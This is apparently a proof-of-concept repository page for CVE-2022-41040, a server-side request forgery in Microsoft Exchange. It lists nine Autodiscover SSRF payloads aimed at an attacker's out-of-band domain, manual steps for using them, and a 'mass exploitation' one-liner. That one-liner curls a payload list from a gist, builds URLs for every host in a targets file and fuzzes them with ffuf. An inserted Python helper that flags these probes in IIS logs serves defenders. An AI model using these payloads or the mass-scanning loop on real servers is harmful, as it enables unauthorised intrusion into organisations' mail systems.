
CVE-2022-41040 PoC — Microsoft Exchange Server Elevation of Privilege Vulnerability

Source
Associated Vulnerability
Title: Microsoft Exchange Server Elevation of Privilege Vulnerability (CVE-2022-41040)
Description: Microsoft Exchange Server Elevation of Privilege Vulnerability
Description
CVE-2022-41040 - Server Side Request Forgery (SSRF) in Microsoft Exchange Server
Readme
# CVE-2022-41040-POC
CVE-2022-41040 - Server Side Request Forgery (SSRF) in Microsoft Exchange Server

## Manual exploitation

1. Replace `COLLABHERE` with your OOB domain - `sed 's/COLLABHERE/<oob-domain>/g'`

2. Add payloads next to URLs you want to test - `echo http://target.com|unfurl format %s://%d/<payload>`

3. Visit crafted URLs

4. Check your collaborator

Payloads:
```
/autodiscover/autodiscover.json?@%d.v1.COLLABHERE/&Email=autodiscover/autodiscover.json%3f@%d.v1.COLLABHERE
/autodiscover/autodiscover.json/v1.0/aa@%d.v2.COLLABHERE?Protocol=Autodiscoverv1
/autodiscover/autodiscover.json/v1.0/aa..@%d.v3.COLLABHERE/owa/?&Email=autodiscover/autodiscover.json?a..@%d.v3.COLLABHERE&Protocol=Autodiscoverv1&Protocol=Powershell
/autodiscover/autodiscover.json/v1.0/aa@%d.v4.COLLABHERE/owa/?&Email=autodiscover/autodiscover.json?a@%d.v4.COLLABHERE&Protocol=Autodiscoverv1&Protocol=Powershell
/autodiscover/autodiscover.json?aa..%d.v5.COLLABHERE/owa/?&Email=autodiscover/autodiscover.json?a..%d.v5.COLLABHERE&Protocol=Autodiscoverv1&%d.v5.COLLABHEREProtocol=Powershell
/autodiscover/autodiscover.json?aa@%d.v6.COLLABHERE/owa/?&Email=autodiscover/autodiscover.json?a@%d.v6.COLLABHERE&Protocol=Autodiscoverv1&%d.v6.COLLABHEREProtocol=Powershell
/autodiscover/autodiscover.json?aa..%d.v7.COLLABHERE/owa/?&Email=aa@autodiscover/autodiscover.json?a..%d.v7.COLLABHERE&Protocol=Autodiscoverv1&%d.v7.COLLABHEREProtocol=Powershell
/autodiscover/autodiscover.json?aa@%d.v8.COLLABHERE/owa/?&Email=aa@autodiscover/autodiscover.json?a@%d.v8.COLLABHERE&Protocol=Autodiscoverv1&%d.v8.COLLABHEREProtocol=Powershell
/autodiscover/autodiscover.json/v1.0/aa@autodiscover/autodiscover.json?a..@%d.v9.COLLABHERE&Protocol=Autodiscoverv1&Protocol=Powershell
```
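For defenders triaging web logs, the payload shapes above share a few traits that legitimate Autodiscover traffic does not have (an `@` inside the URI stem, a valueless leading query token carrying a host, a nested `autodiscover/autodiscover.json` reference, and `Protocol=Powershell`). The following Python helper is an added example, not part of the original PoC; the simplified W3C log layout, hostnames and timestamps are constructed for illustration.

```python
"""Triage helper: flag IIS log lines matching the CVE-2022-41040 autodiscover
SSRF probe shapes listed in the README above (added example, not project code)."""
from urllib.parse import unquote

# Constructed lines in a simplified W3C shape (fields: date time method
# cs-uri-stem cs-uri-query sc-status; "-" means an empty query).
SAMPLE_LOG = """\
2022-10-01 10:00:01 GET /owa/auth/logon.aspx url=%2fowa%2f 200
2022-10-01 10:00:02 POST /autodiscover/autodiscover.xml - 401
2022-10-01 10:00:03 GET /autodiscover/autodiscover.json @mail.example.test.v1.oob.example/&Email=autodiscover/autodiscover.json%3f@mail.example.test.v1.oob.example 200
2022-10-01 10:00:04 GET /autodiscover/autodiscover.json/v1.0/aa@mail.example.test.v2.oob.example Protocol=Autodiscoverv1 200
2022-10-01 10:00:05 GET /autodiscover/autodiscover.json Email=alice@example.test&Protocol=Autodiscoverv1 200
2022-10-01 10:00:06 GET /autodiscover/autodiscover.json/v1.0/aa%40x.v4.oob.example/owa/ &Email=autodiscover/autodiscover.json?a@x.v4.oob.example&Protocol=Autodiscoverv1&Protocol=Powershell 500
"""

def classify(stem: str, query: str) -> list[str]:
    """Return why a request looks like an autodiscover SSRF probe ([] = benign).
    Decode first so %40 / %3f encodings cannot dodge the substring checks."""
    stem, query = unquote(stem).lower(), unquote(query).lower()
    if not stem.startswith("/autodiscover/autodiscover.json"):
        return []
    reasons = []
    if "@" in stem:
        reasons.append("'@' in URI stem (host smuggled into the path)")
    first = query.split("&", 1)[0]
    if "=" not in first and ("@" in first or ".." in first):
        reasons.append("valueless leading query token carrying a host")
    if "autodiscover/autodiscover.json" in query:
        reasons.append("nested autodiscover.json reference in query")
    if "protocol=powershell" in query:
        reasons.append("Protocol=Powershell requested via autodiscover")
    return reasons

def scan(log_text: str) -> list[dict]:
    """Parse log lines and return one record per flagged request."""
    hits = []
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) != 6:
            continue  # skip headers / comments / malformed lines
        date, time, _method, stem, query, status = fields
        reasons = classify(stem, "" if query == "-" else query)
        if reasons:
            hits.append({"time": f"{date} {time}", "stem": stem,
                         "status": int(status), "reasons": reasons})
    return hits

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit["time"], hit["status"], hit["stem"], "->", "; ".join(hit["reasons"]))
```

Real IIS logs carry more fields than this constructed layout; adapt the unpacking to the `#Fields:` header of the log you are reading before relying on the result.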

## Mass exploitation

```
for url in $(curl -s https://gist.githubusercontent.com/kljunowsky/a2e8392f63fb8d7c0443f2011bce59ec/raw/7b4cabaa0dab7113b1cab00e1a2cb0c4e3c6ed06/cve-2022-41040-unfurl-payloads.txt|sed 's/COLLABHERE/<OOB-PAYLOAD>/g'); do cat targets.txt |unfurl format $url >> fuzz-ready.txt;done & ffuf -w fuzz-ready.txt -u FUZZ
```

Check your collaborator!

Happy hunting!

### Requirements
[ffuf](https://github.com/ffuf/ffuf)
Thanks [@joohoi](https://github.com/joohoi)!

[unfurl](https://github.com/tomnomnom/unfurl)
Thanks [tomnomnom](https://github.com/tomnomnom)!

[Twitter](https://twitter.com/milanshiftsec)

[LinkedIn](https://www.linkedin.com/in/milan-jovic-sec/)
File Snapshot

[4.0K] /data/pocs/35a1d2afa7f2ddf37c613cd277ac1cc492582297
├── [ 871] CVE-2022-41040.py
└── [2.4K] README.md

0 directories, 2 files